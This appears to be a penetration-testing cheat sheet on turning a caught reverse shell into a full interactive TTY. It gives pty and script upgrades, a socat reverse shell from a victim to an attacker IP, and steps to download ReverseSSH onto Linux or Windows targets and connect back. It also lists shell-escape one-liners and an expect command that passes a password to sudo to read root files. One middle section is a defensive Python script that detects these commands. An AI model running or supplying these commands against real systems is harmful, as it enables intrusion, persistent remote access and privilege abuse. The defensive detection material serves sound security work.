Full TTYs

Full TTY

Note that the shell you set in the SHELL variable must be listed inside /etc/shells, otherwise you get the error "The value for the SHELL variable was not found in the /etc/shells file This incident has been reported". Also note that the following snippets only work in bash. If you are in zsh, switch to bash before obtaining the shell by running bash.

Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

You can get the number of rows and columns by running stty -a

script

script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

socat

#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

Spawn shells

  • python -c 'import pty; pty.spawn("/bin/sh")'

  • echo os.system('/bin/bash')

  • /bin/sh -i

  • script -qc /bin/bash /dev/null

  • perl -e 'exec "/bin/sh";'

  • perl: exec "/bin/sh";

  • ruby: exec "/bin/sh"

  • lua: os.execute('/bin/sh')

  • IRB: exec "/bin/sh"

  • vi: :!bash

  • vi: :set shell=/bin/bash:shell

  • nmap: !sh
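From the defender's side, the command lines above are distinctive enough to alert on in process-execution telemetry. The following is an added example, not part of the original page: it matches the page's TTY-upgrade commands in log records. The record format (parent=, uid=, cmd=), the rule names and the SERVICE_PARENTS set are assumptions, and the sample records are constructed.

```python
import re

# Rules built from the command lines listed on this page.
RULES = {
    "python-pty-spawn": re.compile(r"\bpython[\d.]*\s+-c\s+.*\bpty\.spawn\b"),
    "script-devnull-shell": re.compile(
        r"(?:^|[\s/])script\s+(?=.*/dev/null)(?=.*-q?c\s+\S*sh\b)"),
    "socat-exec-pty": re.compile(r"\bsocat\b.*\bexec:.*\bpty\b"),
    "perl-ruby-exec-shell": re.compile(
        r"\b(?:perl|ruby)\s+-e\s+.*\bexec\s+[\"']\S*sh\b"),
    "expect-sudo-stdin": re.compile(r"\bexpect\s+-c\s+.*\bspawn\s+sudo\s+-S\b"),
}

# Assumption: parents that should never start an interactive shell.
SERVICE_PARENTS = {"apache2", "nginx", "php-fpm", "java", "node"}

# Hypothetical record format: parent=<comm> uid=<n> cmd=<command line>
RECORD = re.compile(r"^parent=(\S+) uid=(\d+) cmd=(.*)$")


def scan(lines):
    """Return (rule, parent, uid, priority) for each matching record."""
    hits = []
    for line in lines:
        m = RECORD.match(line.strip())
        if not m:
            continue  # skip malformed records instead of crashing
        parent, uid, cmd = m.group(1), int(m.group(2)), m.group(3)
        for name, rx in RULES.items():
            if rx.search(cmd):
                prio = "high" if parent in SERVICE_PARENTS else "review"
                hits.append((name, parent, uid, prio))
                break  # one alert per record
    return hits


# Constructed sample records (not real logs).
SAMPLE = [
    'parent=apache2 uid=33 cmd=python3 -c import pty; pty.spawn("/bin/bash")',
    'parent=sh uid=33 cmd=script /dev/null -qc /bin/bash',
    'parent=bash uid=1000 cmd=script -a session.log',
    'parent=nginx uid=33 cmd=socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444',
    'parent=sh uid=33 cmd=expect -c spawn sudo -S cat "/root/root.txt";expect "*password*"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The benign `script -a session.log` record is not flagged, because the rule requires both /dev/null and a -c shell argument.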

ReverseSSH

A convenient way to get interactive shell access, as well as file transfers and port forwarding, is to drop the statically linked ssh server ReverseSSH onto the target.

Below is an example for x86 with upx-compressed binaries. For other binaries, check the releases page.

  1. Prepare locally to catch the ssh port forwarding request:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -v -l -p 4444
  • (2a) Linux target:

# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh

/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
  • (2b) Windows target:

# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe

reverse-ssh.exe -p 4444 kali@10.0.0.2
  • If the SSH port forwarding request was successful, you should now be able to log in with the default password letmeinbrudipls in the context of the user running reverse-ssh(.exe):

# Interactive shell access
ssh -p 8888 127.0.0.1

# Bidirectional file transfer
sftp -P 8888 127.0.0.1

No TTY

If for some reason you cannot obtain a full TTY, you can still interact with programs that expect user input. In the following example, the password is passed to sudo to read a file:

expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'